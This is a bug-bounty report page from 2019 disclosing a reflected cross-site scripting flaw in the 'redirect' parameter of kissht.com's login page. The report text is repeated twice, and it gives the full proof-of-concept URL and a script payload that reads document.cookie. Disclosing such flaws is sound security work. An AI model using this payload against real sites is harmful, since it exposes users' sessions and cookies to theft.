BLT Issue - Vulnerability Name : Cross Site Scripting \u002D (on user login and signup entering page)\u000D\u000A\u000D\u000AVulnerable URL : https://kissht.com/login?redirect\u003D%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\u000D\u000A\u000D\u000AVulnerable Parameter : redirect\u000D\u000A\u000D\u000AVulnerable Payload : \u0022hello\u0022/\u003E\u003Cscript\u003Ealert(document.cookie)\u003C/script\u003E\u000D\u000A\u000D\u000A\u000D\u000AHow to reproduce this issue:\u000D\u000A\u000D\u000A1. Visit the url it will give an XSS popup.\u000D\u000A\u000D\u000Ahttps://kissht.com/login?redirect\u003D%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\u000D\u000A\u000D\u000APOC :\u000D\u000A\u000D\u000AScreenshort can be found in the attachment.

Vulnerability Name : Cross Site Scripting \u002D (on user login and signup entering page)\u000D\u000A\u000D\u000AVulnerable URL : https://kissht.com/login?redirect\u003D%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\u000D\u000A\u000D\u000AVulnerable Parameter : redirect\u000D\u000A\u000D\u000AVulnerable Payload : \u0022hello\u0022/\u003E\u003Cscript\u003Ealert(document.cookie)\u003C/script\u003E\u000D\u000A\u000D\u000A\u000D\u000AHow to reproduce this issue:\u000D\u000A\u000D\u000A1. Visit the url it will give an XSS popup.\u000D\u000A\u000D\u000Ahttps://kissht.com/login?redirect\u003D%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\u000D\u000A\u000D\u000APOC :\u000D\u000A\u000D\u000AScreenshort can be found in the attachment.

Tweet GitHub Link

To comment, please sign in.

mrhacker14012001

Total Points = 10

Reported on kissht.com

Issues Reported: 4

Browser Version: 60.0

Operating System Linux

Added On

May 16, 2019, 3:01 a.m.

Bug Type

Security

Submitted

Independently

OS Version:

Unknown